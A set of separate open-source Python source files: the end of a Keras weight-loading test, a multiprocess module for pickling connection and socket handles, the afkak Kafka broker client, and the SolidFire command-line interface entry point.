@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model_added_no_weight_layer(self):
def _save_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
b = keras.layers.Dense(1, name='second')(x)
return keras.models.Model(a, b)
def _restore_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3, name='first')(a)
y = keras.layers.Dropout(rate=0.1)(x)
b = keras.layers.Dense(1, name='second')(y)
return keras.models.Model(a, b)
def _restore_init_fn(restore_model):
del restore_model # unused
return []
self._new_layer_weight_loading_test_template(
_save_graph_model, _restore_graph_model,
_restore_init_fn)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model_added_layer(self):
class SubclassedModelRestore(training.Model):
def __init__(self):
super(SubclassedModelRestore, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.y_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.y_layer(self.x_layer(a)))
def _restore_init_fn(restore_model):
return [v.initializer for v in restore_model.y_layer.variables]
self._new_layer_weight_loading_test_template(
SubclassedModel, SubclassedModelRestore,
_restore_init_fn)
if __name__ == '__main__':
test.main()
|
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = []
import os
import sys
import socket
import threading
import _multiprocess as _multiprocessing
from multiprocess import current_process
from multiprocess.forking import Popen, duplicate, close, ForkingPickler
from multiprocess.util import register_after_fork, debug, sub_debug
from multiprocess.connection import Client, Listener
#
#
#
if not(sys.platform == 'win32' or hasattr(_multiprocessing, 'recvfd')):
raise ImportError('pickling of connections not supported')
#
# Platform specific definitions
#
if sys.platform == 'win32':
import _subprocess
from _multiprocess import win32
def send_handle(conn, handle, destination_pid):
process_handle = win32.OpenProcess(
win32.PROCESS_ALL_ACCESS, False, destination_pid
)
try:
new_handle = duplicate(handle, process_handle)
conn.send(new_handle)
finally:
close(process_handle)
def recv_handle(conn):
return conn.recv()
else:
def send_handle(conn, handle, destination_pid):
_multiprocessing.sendfd(conn.fileno(), handle)
def recv_handle(conn):
return _multiprocessing.recvfd(conn.fileno())
#
# Support for a per-process server thread which caches pickled handles
#
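# Flow, as implemented below: reduce_handle() duplicates the handle, stashes
# the duplicate in _cache and hands back the listener's address;
# rebuild_handle() in the receiving process connects to that address
# (authenticated with current_process().authkey), sends the handle number and
# its pid, and _serve() replies by pushing the handle across with send_handle().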
_cache = set()
def _reset(obj):
global _lock, _listener, _cache
for h in _cache:
close(h)
_cache.clear()
_lock = threading.Lock()
_listener = None
_reset(None)
register_after_fork(_reset, _reset)
def _get_listener():
global _listener
if _listener is None:
_lock.acquire()
try:
if _listener is None:
debug('starting listener and thread for sending handles')
_listener = Listener(authkey=current_process().authkey)
t = threading.Thread(target=_serve)
t.daemon = True
t.start()
finally:
_lock.release()
return _listener
def _serve():
from .util import is_exiting, sub_warning
while 1:
try:
conn = _listener.accept()
handle_wanted, destination_pid = conn.recv()
_cache.remove(handle_wanted)
send_handle(conn, handle_wanted, destination_pid)
close(handle_wanted)
conn.close()
except:
if not is_exiting():
import traceback
sub_warning(
'thread for sharing handles raised exception :\n' +
'-'*79 + '\n' + traceback.format_exc() + '-'*79
)
#
# Functions to be used for pickling/unpickling objects with handles
#
def reduce_handle(handle):
if Popen.thread_is_spawning():
return (None, Popen.duplicate_for_child(handle), True)
dup_handle = duplicate(handle)
_cache.add(dup_handle)
sub_debug('reducing handle %d', handle)
return (_get_listener().address, dup_handle, False)
def rebuild_handle(pickled_data):
address, handle, inherited = pickled_data
if inherited:
return handle
sub_debug('rebuilding handle %d', handle)
conn = Client(address, authkey=current_process().authkey)
conn.send((handle, os.getpid()))
new_handle = recv_handle(conn)
conn.close()
return new_handle
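# Illustrative round trip (hypothetical variable names):
#
#     reduced = reduce_handle(parent_conn.fileno())   # in the sending process
#     # ... transfer `reduced` to the other process by any pickling channel ...
#     fd = rebuild_handle(reduced)                    # in the receiving process
#     conn = _multiprocessing.Connection(fd)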
#
# Register `_multiprocessing.Connection` with `ForkingPickler`
#
def reduce_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_connection, (rh, conn.readable, conn.writable)
def rebuild_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _multiprocessing.Connection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_multiprocessing.Connection, reduce_connection)
#
# Register `socket.socket` with `ForkingPickler`
#
def fromfd(fd, family, type_, proto=0):
s = socket.fromfd(fd, family, type_, proto)
if s.__class__ is not socket.socket:
s = socket.socket(_sock=s)
return s
def reduce_socket(s):
reduced_handle = reduce_handle(s.fileno())
return rebuild_socket, (reduced_handle, s.family, s.type, s.proto)
def rebuild_socket(reduced_handle, family, type_, proto):
fd = rebuild_handle(reduced_handle)
_sock = fromfd(fd, family, type_, proto)
close(fd)
return _sock
ForkingPickler.register(socket.socket, reduce_socket)
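# The registration above makes socket.socket objects picklable by
# ForkingPickler: pickling invokes reduce_socket(), which packages the file
# descriptor via reduce_handle(), and unpickling calls rebuild_socket() to
# recreate a usable socket in the receiving process.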
#
# Register `_multiprocessing.PipeConnection` with `ForkingPickler`
#
if sys.platform == 'win32':
def reduce_pipe_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_pipe_connection, (rh, conn.readable, conn.writable)
def rebuild_pipe_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _multiprocessing.PipeConnection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_multiprocessing.PipeConnection, reduce_pipe_connection)
|
|
# -*- coding: utf-8 -*-
# Copyright 2015 Cyan, Inc.
# Copyright 2017, 2018, 2019, 2021 Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""KafkaBrokerClient and private _Request classes.
Low level network client for the Apache Kafka Message Broker.
"""
import logging
import reprlib
from collections import OrderedDict
from datetime import datetime
from functools import partial
import attr
from twisted.internet.defer import Deferred, fail, maybeDeferred
from twisted.internet.protocol import ClientFactory
from twisted.internet.task import deferLater
from twisted.python.failure import Failure
from ._protocol import KafkaProtocol
from .common import ClientError, DuplicateRequestError
from .kafkacodec import KafkaCodec, _ReprRequest
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
MAX_RECONNECT_DELAY_SECONDS = 15
INIT_DELAY_SECONDS = 0.1
@attr.s(slots=True)
class _RequestState(object):
"""
Private helper class to hold flags about in-flight requests.
:ivar int correlationId: Unique-per-connection ID number for the request.
:ivar bytes request: Serialized Kafka PDU, less the length prefix.
:ivar bool expectResponse:
Is a response expected for this request? If not, it will be discarded
once it has been written to the protocol.
:ivar datetime queued:
When was `_KafkaBrokerClient.makeRequest()` called?
:ivar datetime sent:
When was this request written to a connection? `None` if that hasn't
happened yet. A request that hasn't been written will be discarded
immediately (never sent) when cancelled.
:ivar datetime cancelled:
When was the deferred for this request canceled? `None` if it hasn't
been. The queue entry for a cancelled request is kept around if it has
been sent so that the response correlation logic can differentiate
between responses that were too late vs. responses to requests that
were never sent.
"""
correlationId = attr.ib()
request = attr.ib(repr=False)
expectResponse = attr.ib()
d = attr.ib()
queued = attr.ib()
sent = attr.ib(default=None)
cancelled = attr.ib(default=None)
_aLongerRepr = reprlib.Repr()
_aLongerRepr.maxother = 1024 # bytes is not str, counts as "other"
class _KafkaBrokerClient(ClientFactory):
"""
The low-level client which handles transport to a single Kafka broker.
The KafkaBrokerClient object is responsible for maintaining a connection to
a single Kafka broker, reconnecting as needed, over which it sends requests
    and receives responses. Callers make requests with :py:meth:`makeRequest`.
"""
protocol = KafkaProtocol
# Reduce log spam from twisted
noisy = False
def __init__(self, reactor, endpointFactory, brokerMetadata, clientId,
retryPolicy):
"""
Create a client for a specific broker
The broker client connects to the broker as needed to handle requests.
Requests are retried when the connection fails before the client
receives the response. Requests can be cancelled at any time.
:param reactor: Twisted reactor to use for connecting and when scheduling
delayed calls.
:param endpointFactory:
Callable that accepts (reactor, host, port) as arguments and
returns an IStreamClientEndpoint to use to connect to the broker.
:param BrokerMetadata brokerMetadata:
Broker node ID, host, and port. This may be updated later by
calling updateMetadata().
:param str clientId: Identifying string for log messages. NOTE: not the
ClientId in the RequestMessage PDUs going over the wire.
"""
self._reactor = reactor # ReconnectingClientFactory uses self.clock.
self._endpointFactory = endpointFactory
self.node_id = brokerMetadata.node_id
self.host = brokerMetadata.host
self.port = brokerMetadata.port
self.clientId = clientId
self._retryPolicy = retryPolicy
# No connector until we try to connect
self.connector = None
# The protocol object for the current connection
self.proto = None
# ordered dict of _Requests, keyed by requestId
self.requests = OrderedDict()
# deferred which fires when the close() completes
self._dDown = None
def __repr__(self):
"""return a string representing this KafkaBrokerClient."""
return '_KafkaBrokerClient<node_id={} {}:{} {}>'.format(
self.node_id,
self.host,
self.port,
'connected' if self.connected() else 'unconnected',
)
def updateMetadata(self, new):
"""
Update the metadata stored for this broker.
Future connections made to the broker will use the host and port
defined in the new metadata. Any existing connection is not dropped,
however.
:param new:
            :class:`afkak.common.BrokerMetadata` with the same node ID as the
current metadata.
"""
if self.node_id != new.node_id:
raise ValueError("Broker metadata {!r} doesn't match node_id={}".format(new, self.node_id))
self.node_id = new.node_id
self.host = new.host
self.port = new.port
def makeRequest(self, correlationId, request, expectResponse=True):
"""
Send a request to this broker.
The request may not be sent immediately, but it should be sent soon.
A connection to the broker is created when the first request is made.
Each request is sent at most once per broker connection. If the
connection drops while requests are outstanding then requests are
resent upon reconnection in the order originally issued.
This method returns a deferred that fires with the `bytes` of the
broker response. It may fail in a few ways:
- With `ClientError` when the `_KafkaBrokerClient` is closed.
- With `twisted.internet.defer.CancelledError` if its :meth:`cancel()
<twisted.internet.defer.Deferred.cancel>`_ method is called.
- With some other exception in the case of bugs.
Cancelling the deferred _may_ prevent the request from being sent to
a broker.
:param int correlationId:
ID number used to match responses with requests. This must match
the number embedded in *request*.
:param bytes request:
The serialized request PDU (not including the length prefix).
        :param bool expectResponse:
Will the Kafka broker send a response? Unsetting this flag changes
the result:
- The request is considered sent as soon as it has been enqueued
for write to a connection. It will never be resent, and will be
lost if the connection drops before the broker processes it.
- The returned deferred will fire with `None` instead of
a response.
:returns: Deferred that fires when the request has been processed
:raises DuplicateRequestError: when *correlationId* is reused. This
represents a programming error on the caller's part.
"""
if correlationId in self.requests:
            # The ID duplicates an 'in-flight' request. Reject it, as we
            # won't be able to properly deliver the response(s).
            # Note that this won't protect against a client calling us
            # twice with the same ID, but first with expectResponse=False.
            # But that's pathological, and the only defense is to track
# all requestIds sent regardless of whether we expect to see
# a response, which is effectively a memory leak...
raise DuplicateRequestError('Reuse of correlationId={}'.format(correlationId))
# If we've been told to shutdown (close() called) then fail request
if self._dDown:
return fail(ClientError("Broker client for node_id={} {}:{} has been closed".format(
self.node_id, self.host, self.port)))
# Ok, we are going to save/send it, create a _Request object to track
self.requests[correlationId] = tReq = _RequestState(
correlationId,
request,
expectResponse,
d=Deferred(partial(self._cancelRequest, correlationId)),
queued=datetime.utcfromtimestamp(self._reactor.seconds()),
)
# Do we have a connection over which to send the request?
if self.proto:
# Send the request
# TODO: Flow control
self._sendRequest(tReq)
# Have we not even started trying to connect yet? Do so now
elif not self.connector:
self._connect()
return tReq.d
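    # Illustrative call pattern (hypothetical names; in afkak the caller is
    # normally the higher-level client, which encodes the request PDU and
    # allocates the correlation ID):
    #
    #     d = broker.makeRequest(correlation_id, encoded_request)
    #     d.addCallback(decode_response_bytes)   # fires with the response bytes
    #     d.addErrback(handle_request_failure)   # ClientError, CancelledError, ...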
def disconnect(self):
"""
Disconnect from the Kafka broker.
This is used to implement disconnection on timeout as a workaround for
Kafka connections occasionally getting stuck on the server side under
load. Requests are not cancelled, so they will be retried.
"""
if self.proto:
log.debug('%r Disconnecting from %r', self, self.proto.transport.getPeer())
self.proto.transport.loseConnection()
def close(self):
"""Permanently dispose of the broker client.
This terminates any outstanding connection and cancels any pending
requests.
"""
log.debug('%r: close() proto=%r connector=%r', self, self.proto, self.connector)
assert self._dDown is None
self._dDown = Deferred()
if self.proto is not None:
self.proto.transport.loseConnection()
elif self.connector is not None:
def connectingFailed(reason):
"""
Handle the failure resulting from cancellation.
:reason: a `Failure`, most likely a cancellation error (but
that's not guaranteed).
:returns: `None` to handle the failure
"""
log.debug('%r: connection attempt has been cancelled: %r', self, reason)
self._dDown.callback(None)
self.connector.addErrback(connectingFailed)
self.connector.cancel()
else:
# Fake a cleanly closing connection
self._dDown.callback(None)
try:
raise ClientError("Broker client for node_id={} {}:{} was closed".format(
self.node_id, self.host, self.port))
except Exception:
reason = Failure()
# Cancel any requests
while self.requests:
correlationId, tReq = self.requests.popitem(True)
if tReq.cancelled is None:
tReq.d.errback(reason)
return self._dDown
def connected(self):
"""Are we connected to a Kafka broker?"""
return self.proto is not None
def _connectionLost(self, reason):
"""Called when the protocol connection is lost
- Log the disconnection.
- Mark any outstanding requests as unsent so they will be sent when
a new connection is made.
- If closing the broker client, mark completion of that process.
:param reason:
Failure that indicates the reason for disconnection.
"""
log.info('%r: Connection closed: %r', self, reason)
# Reset our proto so we don't try to send to a down connection
self.proto = None
# Mark any in-flight requests as unsent, discard cancelled requests.
for tReq in list(self.requests.values()):
if tReq.cancelled is not None:
del self.requests[tReq.correlationId]
else:
tReq.sent = None
if self._dDown:
self._dDown.callback(None)
elif self.requests:
self._connect()
def handleResponse(self, response):
"""Handle the response string received by KafkaProtocol.
Ok, we've received the response from the broker. Find the requestId
in the message, lookup & fire the deferred with the response.
"""
correlationId = KafkaCodec.get_response_correlation_id(response)
# Protect against responses coming back we didn't expect
tReq = self.requests.pop(correlationId, None)
if tReq is None:
# The broker sent us a response to a request we didn't make.
log.error('Unexpected response with correlationId=%d: %s',
correlationId, _aLongerRepr.repr(response))
elif tReq.cancelled is not None:
now = datetime.utcfromtimestamp(self._reactor.seconds())
log.debug(
'Response to %s arrived %s after it was cancelled (%d bytes)',
_ReprRequest(tReq.request),
now - tReq.cancelled,
len(response),
)
else:
tReq.d.callback(response)
# # Private Methods # #
def _sendRequest(self, tReq):
"""Send a single request over our protocol to the Kafka broker."""
try:
tReq.sent = datetime.utcfromtimestamp(self._reactor.seconds())
self.proto.sendString(tReq.request)
except Exception as e:
log.exception('%r: Failed to send request %r', self, tReq)
del self.requests[tReq.correlationId]
tReq.d.errback(e)
else:
if not tReq.expectResponse:
# Once we've sent a request for which we don't expect a reply,
# we're done, remove it from requests, and fire the deferred
# with 'None', since there is no reply to be expected
del self.requests[tReq.correlationId]
tReq.d.callback(None)
def _sendQueued(self):
"""Connection just came up, send the unsent requests."""
for tReq in list(self.requests.values()): # must copy, may del
if tReq.sent is None:
self._sendRequest(tReq)
def _cancelRequest(self, correlationId, deferred):
"""
The ``cancel()`` method of a deferred returned by :meth:`makeRequest()`
was called. If the request hasn't been sent, remove it from the queue.
Otherwise it is flagged as cancelled so it won't be resent. The
queue table entry is retained so if a response comes we don't log an
error.
"""
tReq = self.requests[correlationId]
if tReq.sent is not None:
tReq.cancelled = datetime.utcfromtimestamp(self._reactor.seconds())
else:
del self.requests[correlationId]
def _abortRequest(self, correlationId, reason):
"""
Remove a request from the queue and fail its deferred.
:param int correlationId: Request ID
:param reason: :class:`twisted.python.failure.Failure` instance to
errback the request deferred with
"""
tReq = self.requests.pop(correlationId)
tReq.d.errback(reason)
def _connect(self):
"""Connect to the Kafka Broker
This routine will repeatedly try to connect to the broker (with backoff
according to the retry policy) until it succeeds.
"""
def tryConnect():
self.connector = d = maybeDeferred(connect)
d.addCallback(cbConnect)
d.addErrback(ebConnect)
def connect():
endpoint = self._endpointFactory(self._reactor, self.host, self.port)
log.debug('%r: connecting with %s', self, endpoint)
return endpoint.connect(self)
def cbConnect(proto):
log.debug('%r: connected to %r', self, proto.transport.getPeer())
self._failures = 0
self.connector = None
self.proto = proto
if self._dDown:
proto.transport.loseConnection()
else:
self._sendQueued()
def ebConnect(fail):
if self._dDown:
log.debug('%r: breaking connect loop due to %r after close()', self, fail)
return fail
self._failures += 1
delay = self._retryPolicy(self._failures)
log.debug('%r: failure %d to connect -> %s; retry in %.2f seconds.',
self, self._failures, fail.value, delay)
self.connector = d = deferLater(self._reactor, delay, lambda: None)
d.addCallback(cbDelayed)
def cbDelayed(result):
tryConnect()
self._failures = 0
tryConnect()
|
|
import logging
import logging.config
import os
import sys
import click
import click.core
import click.testing
import copy
import csv
import pkg_resources
from pkg_resources import Requirement, resource_filename
import struct
import base64
logging.basicConfig(
level=logging.WARNING,
format=('%(asctime)s - %(name)s: in %(filename)s at %(lineno)s - %(levelname)s: %(message)s'))
LOG = logging.getLogger(__name__)
CONTEXT_SETTINGS = dict(auto_envvar_prefix='SOLIDFIRE', token_normalize_func=lambda x: x.lower())
HELP_STRING = """Welcome to the SolidFire Command Line Interface """ + pkg_resources.require("solidfire-cli")[0].version + """.
For more information about how to use this, see the readme here: https://github.com/solidfire/solidfire-cli."""
DEBUG_LOGGING_MAP = {
0: logging.CRITICAL,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG
}
CLI_VERSION = 'v1'
click.disable_unicode_literals_warning = True
class Context():
def __init__(self):
self.logger = None
self.verbose = False
self.home = os.getcwd()
self.connections = dict()
self.element = None
self.depth = None
self.json = None
self.pickle = None
self.filter_tree = None
self.table = None
self.verifyssl = None
self.timeout = 30
self.nocache = None
def log(self, msg, *args):
"""Logs a message to stderr."""
if args:
msg %= args
click.echo(msg, file=sys.stderr)
def vlog(self, msg, *args):
"""Logs a message to stderr only if verbose is enabled."""
if self.verbose:
self.log(msg, *args)
pass_context = click.make_pass_decorator(Context, ensure=True)
cmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__),
'commands'))
class SolidFireCLI(click.MultiCommand):
def list_commands(self, ctx):
rv = []
for filename in os.listdir(cmd_folder):
if filename.endswith('.py') and \
filename.startswith('cmd_'):
rv.append(filename[4:-3])
rv.sort()
return rv
def get_command(self, ctx, name):
try:
if sys.version_info[0] == 2:
name = name.encode('ascii', 'replace')
import_string = (
"element.cli.commands.cmd_%s" % (name.lower()))
mod = __import__(import_string, None, None, ['cli'])
except ImportError as e:
LOG.error(name.lower()+" is not a valid module. Please run 'sfcli --help' for a list of valid modules.")
exit(1)
return mod.cli
class SolidFireParsingState(click.parser.ParsingState):
def __init__(self, args):
self.subparameters = []
click.parser.ParsingState.__init__(self, args)
class SolidFireParser(click.parser.OptionParser):
    # We override this because we need to inject our custom parsing state
    # class (SolidFireParsingState) in place of the native ParsingState.
    # Other than that, the logic is the same as click's OptionParser.
def parse_args(self, args):
"""Parses positional arguments and returns ``(values, args, order)``
for the parsed options and arguments as well as the leftover
arguments if there are any. The order is a list of objects as they
appear on the command line. If arguments appear multiple times they
will be memorized multiple times as well.
"""
state = SolidFireParsingState(args)
try:
self._process_args_for_options(state)
self._process_args_for_args(state)
except click.parser.UsageError:
if self.ctx is None or not self.ctx.resilient_parsing:
raise
return state.opts, state.largs, state.order
    # This is the method we are really overriding. Normally it consumes the
    # argument array exactly as the user typed it; here we also inject any
    # expected subparameters with an empty value whenever the user does not
    # provide them.
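    # A sketch of that behavior, using a hypothetical super parameter
    # --metadata that declares subparameters ["key", "value"]:
    #   user input  : --metadata --key foo --another-opt bar
    #   after fix-up: --metadata --key foo --value "" --another-opt bar
    # The missing --value is injected with an empty value so the command
    # callback still receives every expected member of the parameter group.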
def _match_long_opt(self, opt, explicit_value, state):
option = self._long_opt.get(opt, None)
        if option is not None:
if type(option.obj) == SolidFireOption and\
option.obj.is_sub_parameter and\
opt[2:] not in state.subparameters:
raise click.parser.BadOptionUsage(opt+" is a subparameter and cannot be provided in this context.")
if state.subparameters != [] and opt[2:] not in state.subparameters:
# If we find out that there were some options we were expecting
# that didn't show up, we account for them by setting them to
# none here, pushing them into the state machine, and returning.
# We'll process them in the next iteration.
extraParams = []
for paramName in state.subparameters:
extraParams.append("--"+paramName)
extraParams.append("")
extraParams.append(opt)
state.rargs = extraParams + state.rargs
return
# If we've gotten here, it implies that we are either handling
# an expected subparameter (ie opt[2:] in state.subparameters)
# or we're handling a regular parameter (ie state.subparameters=[])
# If it is a subparameter,
# First, remove it from the expected subparameters list because
# we found it!
if opt[2:] in state.subparameters:
state.subparameters.remove(opt[2:])
# Now, one way or another, we process it.
# This kicks us out with an error if option=None. Hence, everything
# following definitely has an option.
click.OptionParser._match_long_opt(self, opt, explicit_value, state)
# Finally, if this is a regular parameter, there is a chance it has
# subparameters we need to expect. We add them to the state machine
# here. These will be expected in the next iteration. Note well, by
# the time we're handling regular parameters, state.subparameters=[].
if state.subparameters == [] and type(option.obj) == SolidFireOption:
state.subparameters = copy.deepcopy(option.obj.subparameters)
# This is the edge case: If we've run out of rargs
# but we still are expecting some subparams, empty
# them into rargs now.
if state.rargs == [] and state.subparameters != []:
for paramName in state.subparameters:
state.rargs.append("--" + paramName)
state.rargs.append("")
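        # Edge-case example (same hypothetical names as the sketch above): if
        # the user input ends at "--metadata --key foo", "value" is still
        # pending, so the loop above appends "--value" and "" to rargs and it
        # gets parsed on the next iteration.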
class SolidFireOption(click.core.Option):
    def __init__(self, param_decls=None, subparameters=None, is_sub_parameter=False, *args, **kwargs):
        # Simply a list of option names that depend on this parameter. Default
        # to None rather than a shared mutable [] default argument.
        self.subparameters = subparameters if subparameters is not None else []
        self.is_sub_parameter = is_sub_parameter
        if is_sub_parameter and self.subparameters != []:
            raise click.BadParameter("An option cannot be both a super parameter and a subparameter.")
click.core.Option.__init__(self, param_decls, *args, **kwargs)
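    # A minimal sketch of how a command module might wire this up (the option
    # names here are hypothetical, not taken from an actual command file):
    #
    #   @click.option('--metadata', cls=SolidFireOption,
    #                 subparameters=['key', 'value'])
    #   @click.option('--key', cls=SolidFireOption, is_sub_parameter=True)
    #   @click.option('--value', cls=SolidFireOption, is_sub_parameter=True)
    #
    # --key and --value may then only be supplied right after --metadata, and
    # SolidFireParser fills in any that are omitted with an empty value.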
def type_cast_value(self, ctx, value):
"""Given a value this runs it properly through the type system.
This automatically handles things like `nargs` and `multiple` as
well as composite types.
"""
if self.type.is_composite:
if self.nargs <= 1:
raise TypeError('Attempted to invoke composite type '
'but nargs has been set to %s. This is '
'not supported; nargs needs to be set to '
'a fixed value > 1.' % self.nargs)
if self.multiple:
return tuple(self.type(x or (), self, ctx) for x in value or ())
return self.type(value or (), self, ctx)
def _convert(value, level):
if level == 0:
if value == "":
#if self.required and self.is_sub_parameter:
# raise click.BadParameter(self.name+" is a required member of its parameter group. Please provide it inline after the associated superparameter.")
return None
return self.type(value, self, ctx)
return tuple(_convert(x, level - 1) for x in value or ())
        return _convert(value, (self.nargs != 1) + bool(self.multiple))
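    # Note on the empty-string check in _convert: the placeholders injected by
    # SolidFireParser for omitted subparameters arrive as "", and _convert maps
    # them to None so downstream code can treat them as not supplied rather
    # than as empty strings.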
class SolidFireCommand(click.Command):
def make_parser(self, ctx):
"""Creates the underlying option parser for this command."""
parser = SolidFireParser(ctx)
parser.allow_interspersed_args = ctx.allow_interspersed_args
parser.ignore_unknown_options = ctx.ignore_unknown_options
for param in self.get_params(ctx):
param.add_to_parser(parser, ctx)
return parser
"""
SDK1.6 Note:
    Since print_tree output is not supported in SDK 1.6, the depth and
    filter_tree params are removed from --help, as they should not be used.
"""
@click.command(cls=SolidFireCLI, context_settings=CONTEXT_SETTINGS, help=HELP_STRING)
@click.option('--mvip', '-m',
default=None,
help="SolidFire MVIP.",
required=False)
@click.option('--username', '-u',
default=None,
help="SolidFire Cluster username.",
required=False)
@click.option('--password', '-p',
default=None,
help="SolidFire cluster password.",
required=False)
@click.option('--version', '-v',
default=None,
              help='The version of the API you would like to connect with.',
required=False)
@click.option('--port', '-q',
default=443,
help="The port number on which you wish to connect.",
required=False)
@click.option('--name', '-n',
default = None,
help="The name of the connection you wish to use in connections.csv. You can use this if you have previously stored away a connection with 'sfcli connection push'.",
required=False)
@click.option('--connectionIndex', '-c',
default=None,
type=click.INT,
help="The index of the connection you wish to use in connections.csv. You can use this if you have previously stored away a connection with 'sfcli connection push'.",
required=False)
@click.option('--verifyssl', '-s',
default = False,
              help="Enable this to check the SSL connection for errors, especially when using a hostname. It is invalid to set this to true when the target is an IP address.",
required=False,
is_flag=True)
@click.option('--timeout', '-t',
default=30,
help="The request timeout in seconds.",
required=False)
@click.option('--json', '-j',
is_flag=True,
required=False,
help="To print the full output in json format, use this flag.")
@click.option('--pickle', '-k',
is_flag=True,
required=False,
help="To print the full output in a pickled json format, use this flag.")
@click.option('--debug',
required=False,
default="1",
help="Set the debug level",
type=click.Choice(sorted([str(key) for key
in DEBUG_LOGGING_MAP.keys()])))
@click.option('--nocache',
required=False,
is_flag=True,
help="If you do not wish to cache the connection, supply this flag.")
@pass_context
def cli(ctx,
mvip=None,
username=None,
password=None,
name=None,
port=None,
verifyssl=False,
timeout=30,
connectionindex=None,
json=None,
pickle=None,
depth=None,
filter_tree=None,
debug=0,
verbose=0,
version=None,
nocache=None):
"""Welcome to the SolidFire command line interface! For more information about how to use this, see the readme here: https://github.com/solidfire/solidfire-cli"""
    # NOTE(jdg): This method is actually our console entry point;
    # if/when we introduce a v2 of the shell and client, we may
    # need to define a new entry point one level up that parses
    # out which version we want to use.
ctx.debug = debug
LOG.setLevel(DEBUG_LOGGING_MAP[int(debug)])
element_logger = logging.getLogger('solidfire.Element')
element_logger.setLevel(DEBUG_LOGGING_MAP[int(debug)])
for h in element_logger.handlers:
element_logger.removeHandler(h)
#if element_logger.hasHandlers():
# element_logger.handlers.clear()
ctx.logger = LOG
ctx.verbose = verbose
ctx.username = username
ctx.password = password
ctx.name = name
ctx.port = port
ctx.connectionindex = connectionindex
ctx.mvip = mvip
ctx.json = json
ctx.pickle = pickle
"""
SDK1.6 Note:
    Since print_tree output is not supported in SDK 1.6, these two fields are
    set to None, as they should not be used.
"""
ctx.depth = None
ctx.filter_tree = None
ctx.verifyssl = verifyssl
ctx.timeout = timeout
ctx.version = version
ctx.nocache = nocache
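# A typical invocation, for illustration only (the MVIP and credentials below
# are placeholders):
#
#   sfcli --mvip 10.0.0.1 --username admin --password admin account list
#
# The global options handled above populate the Context; the trailing
# "account list" is resolved through SolidFireCLI.get_command.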
if __name__ == '__main__':
"""
#pass_context()
#ctx = click.globals.get_current_context()
runner = click.testing.CliRunner()
runner.invoke(element_cli.cli,
["account", "list"])
runner.invoke(element_cli.cli,
['--mvip', "10.117.61.44", "--login", "admin", "--password", "admin", "--name", "b", "Connection",
"PushConnection"])"""
cli.main()
|